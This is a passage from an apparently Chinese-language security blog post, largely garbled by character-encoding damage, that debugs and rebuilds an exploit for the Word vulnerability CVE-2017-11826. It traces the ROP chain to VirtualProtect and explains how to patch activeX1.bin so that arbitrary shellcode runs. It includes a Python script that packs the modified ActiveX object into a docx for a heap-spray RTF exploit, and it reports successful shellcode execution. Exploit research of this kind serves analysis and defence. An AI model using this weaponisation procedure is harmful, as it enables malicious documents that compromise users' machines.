<p>è€Œeaxä¸­çš„å†…å®¹åˆšå¥½ä½äºshellcodeçš„ä¸Šæ–¹ï¼Œæ­¤æ—¶ROPé“¾ä¸ºæ»‘æ¿æŒ‡ä»¤ï¼Œå¾ªç¯æ‰§è¡Œ<code class="language-plaintext highlighter-rouge">pop eax</code>å’Œ<code class="language-plaintext highlighter-rouge">ret</code>ï¼Œæ­¤æ—¶å¯ä»¥ä¸‹æ–­<code class="language-plaintext highlighter-rouge">bp 729440cc ".if(esp=08888f48){}.else{gc}"</code>åœåœ¨äº†æ»‘æ¿æŒ‡ä»¤ç»“æŸçš„ä½ç½®ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804102057063.png" alt="image-20210804102057063" /></p>

<p>å½“æ‰§è¡Œåˆ°æœ€åä¸€æ¬¡æ»‘æ¿æŒ‡ä»¤æ—¶ï¼Œä¼šå°†<code class="language-plaintext highlighter-rouge">0x729410d0</code>æ”¾å…¥eaxä¸­ï¼Œè€Œè¯¥å€¼æ˜¯msvbvm60.dllçš„IATè¡¨ä¸­çš„æ•°æ®ï¼ŒæŸ¥çœ‹åå­˜å‚¨çš„æ˜¯VirtualProtectçš„åœ°å€ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804103009190.png" alt="image-20210804103009190" /></p>

<p>ç´§æ¥ç€é€šè¿‡retè·³è½¬åˆ°ROPæŒ‡ä»¤<code class="language-plaintext highlighter-rouge">jmp [eax]</code>æ‰§è¡ŒVirtualProtectï¼Œè€Œæ­¤æ—¶æ ˆä¸­ä¸ºæ„é€ å¥½çš„VirtualProtectçš„å‚æ•°ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804104003516.png" alt="image-20210804104003516" /></p>

<p>å†æ¬¡è·³è½¬åè¿›å…¥åˆ°kernelbase.dllçš„VirtualProtectï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804104216392.png" alt="image-20210804104216392" /></p>

<p>æ‰§è¡Œåä¼šè·³è½¬åˆ°<code class="language-plaintext highlighter-rouge">0x08888f70</code>æ‰§è¡Œshellcodeï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804104652987.png" alt="image-20210804104652987" /></p>

<p>ç„¶è€ŒVirtualProtectçš„ä¿®æ”¹çš„å†…å­˜èŒƒå›´åªæœ‰<code class="language-plaintext highlighter-rouge">0x08888c90 - 0x08888e91</code>ï¼Œè€Œshellcodeå´ä½äº<code class="language-plaintext highlighter-rouge">0x08888f70</code>ï¼Œå› æ­¤ä¼šè§¦å‘c0000005è®¿é—®å¼‚å¸¸ï¼Œshellcodeæ‰§è¡Œå¤±è´¥ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804105857160.png" alt="image-20210804105857160" /></p>

<h2 id="åˆ©ç”¨æ”¹é€ ">åˆ©ç”¨æ”¹é€ </h2>

<p>activeX1.binæ–‡ä»¶ä¸­å¸ƒå±€å¦‚ä¸‹ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804115244951.png" alt="image-20210804115244951" /></p>

<p>ç”±äºåŸæœ¬VirtualProtectä¿®æ”¹çš„èŒƒå›´ä¸º0x201ä¸å¤Ÿï¼Œå› æ­¤ä¿®æ”¹ä¸º0x1000ç¡®ä¿èƒ½å¤Ÿè¦†ç›–shellcodeï¼Œéšåå°†shellcodeæ›¿æ¢ä¸ºè‡ªå·±çš„shellcodeå³å¯ã€‚</p>

<p>å°†ä¿®æ”¹å¥½çš„activeX1.binæ–‡ä»¶æ›¿æ¢åˆ°rtfobj.pyæå–å‡ºæ¥è¿›è¡Œå †å–·çš„æ–‡æ¡£ä¸­ï¼Œå¹¶ä¿®æ”¹ä¸º.docxï¼Œè„šæœ¬å‚è€ƒ<a href="https://www.tarlogic.com/blog/exploiting-word-cve-2017-11826/">Exploiting Word: CVE-2017-11826</a>ä¸€æ–‡ï¼Œæ›¿æ¢è„šæœ¬å¦‚ä¸‹ï¼š</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">zipfile</span>

<span class="n">template_path</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">final_docx_name</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">activeX_bin_path</span> <span class="o">=</span> <span class="s">""</span>

<span class="k">def</span> <span class="nf">pack_file_to_open_xml_docx</span><span class="p">(</span><span class="n">template_path</span><span class="p">,</span> <span class="n">final_docx_name</span><span class="p">,</span> <span class="n">activeX_bin_path</span><span class="p">):</span> 
    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="n">template_path</span><span class="p">)</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="n">activeX_bin_path</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Template docx file or activeX.bin file not exist."</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">activeX_bin_path</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f_</span><span class="p">:</span> 
        <span class="n">object_bin_data</span> <span class="o">=</span> <span class="n">f_</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

    <span class="n">zip_docx</span> <span class="o">=</span> <span class="n">template_path</span> <span class="o">+</span> <span class="s">".zip"</span>
    <span class="n">current_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">abspath</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">dirname</span><span class="p">(</span><span class="n">__file__</span><span class="p">))</span>
    <span class="n">new_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">current_dir</span><span class="p">,</span> <span class="s">"exp"</span><span class="p">,</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">basename</span><span class="p">(</span><span class="n">zip_docx</span><span class="p">))</span> 
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="n">new_path</span><span class="p">):</span>
        <span class="n">os</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="n">new_path</span><span class="p">)</span>

    <span class="n">shutil</span><span class="p">.</span><span class="n">copy</span><span class="p">(</span><span class="n">template_path</span><span class="p">,</span> <span class="n">new_path</span><span class="p">)</span> 
    <span class="n">zip_docx</span> <span class="o">=</span> <span class="n">new_path</span>
    <span class="c1"># open temp docx and a copy for modification 
</span>    <span class="n">zin</span> <span class="o">=</span> <span class="n">zipfile</span><span class="p">.</span><span class="n">ZipFile</span><span class="p">(</span><span class="n">zip_docx</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> 
    <span class="n">zip_docx_copy</span> <span class="o">=</span> <span class="n">zip_docx</span> <span class="o">+</span> <span class="s">"_copy_"</span> 
    <span class="n">zout</span> <span class="o">=</span> <span class="n">zipfile</span><span class="p">.</span><span class="n">ZipFile</span><span class="p">(</span><span class="n">zip_docx_copy</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span>
    <span class="c1"># modify the docx template with exploit 
</span>    <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">zin</span><span class="p">.</span><span class="n">infolist</span> <span class="p">():</span>
        <span class="k">if</span> <span class="n">item</span><span class="p">.</span><span class="n">filename</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">"activeX1"</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">item</span><span class="p">.</span><span class="n">filename</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">".bin"</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">:</span> 
            <span class="k">pass</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="nb">buffer</span> <span class="o">=</span> <span class="n">zin</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="n">item</span><span class="p">.</span><span class="n">filename</span><span class="p">)</span>
            <span class="n">zout</span><span class="p">.</span><span class="n">writestr</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="nb">buffer</span><span class="p">)</span> <span class="c1"># use existing file
</span>            
    <span class="n">zout</span><span class="p">.</span><span class="n">writestr</span><span class="p">(</span><span class="s">"word/activeX/"</span> <span class="o">+</span> <span class="s">"activeX1.bin"</span><span class="p">,</span> <span class="n">object_bin_data</span><span class="p">)</span> 
    <span class="n">zout</span><span class="p">.</span><span class="n">close</span> <span class="p">()</span> 
    <span class="n">zin</span><span class="p">.</span><span class="n">close</span> <span class="p">()</span>
    <span class="c1"># convert to docx
</span>    <span class="n">os</span><span class="p">.</span><span class="n">rename</span> <span class="p">(</span><span class="n">zip_docx_copy</span><span class="p">,</span> <span class="n">final_docx_name</span><span class="p">)</span> 
    <span class="n">os</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="n">zip_docx</span><span class="p">)</span>

<span class="n">pack_file_to_open_xml_docx</span><span class="p">(</span><span class="n">template_path</span><span class="p">,</span> <span class="n">final_docx_name</span><span class="p">,</span> <span class="n">activeX_bin_path</span><span class="p">)</span>
</code></pre></div></div>

<p>æ–°å»ºä¸€ä¸ªrtfæ–‡ä»¶ï¼Œå°†æ›¿æ¢å¥½çš„docxæ–‡ä»¶æ·»åŠ åˆ°rtfæ–‡ä»¶ä¸­ï¼Œä¿å­˜åä½¿ç”¨010Editoræ‰“å¼€ï¼Œæœç´¢objectï¼Œå°†{\objectå’Œ{*\objdataçš„å…¨éƒ¨å†…å®¹å¤åˆ¶:</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804120429898.png" alt="image-20210804120429898" /></p>

<p>å†æ–°å»ºä¸€ä¸ªrtfæ–‡ä»¶ï¼ŒæŒ‰ç…§å †å–·å°„ã€Bypass ASLRå’Œæ¼æ´è§¦å‘çš„é¡ºåºæ·»åŠ ä¸‰ä¸ªå¯¹è±¡ã€‚å †å–·å°„çš„å†…å®¹å°±æ˜¯ä¸Šæ–¹å¤åˆ¶å¥½çš„å†…å®¹ï¼Œå…¶ä»–ä¸¤ä¸ªå¯ä»¥ç›´æ¥åœ¨åŸEXPä¸­å¤åˆ¶è¿‡æ¥å³å¯ï¼Œæœ€ç»ˆEXPçš„ç»“æ„å¦‚ä¸‹æ‰€ç¤ºï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804141320122.png" alt="image-20210804141320122" /></p>

<p>æœ€ç»ˆæˆåŠŸæ‰§è¡Œäº†shellcodeï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804141657444.png" alt="image-20210804141657444" /></p>

<h1 id="å‚è€ƒé“¾æ¥">å‚è€ƒé“¾æ¥</h1>

<p>[1] <a href="https://www.anquanke.com/post/id/87122">CVE-2017-11826æ¼æ´åˆ†æã€åˆ©ç”¨åŠåŠ¨æ€æ£€æµ‹</a></p>

<p>[2] <a href="https://www.cnblogs.com/goabout2/p/8186018.html">office CVE-2017-11826æ‚è°ˆ</a></p>

<p>[3] <a href="https://www.greyhathacker.net/?p=911">SPRAYING THE HEAP IN SECONDS USING ACTIVEX CONTROLS IN MICROSOFT OFFICE</a></p>

<p>[4] <a href="https://www.tarlogic.com/blog/exploiting-word-cve-2017-11826/">Exploiting Word: CVE-2017-11826</a></p>

<p>[5] <a href="https://www.anquanke.com/post/id/103080">Open XMLæ ‡ç­¾è§£æç±»æ¼æ´åˆ†ææ€è·¯</a></p>

:ET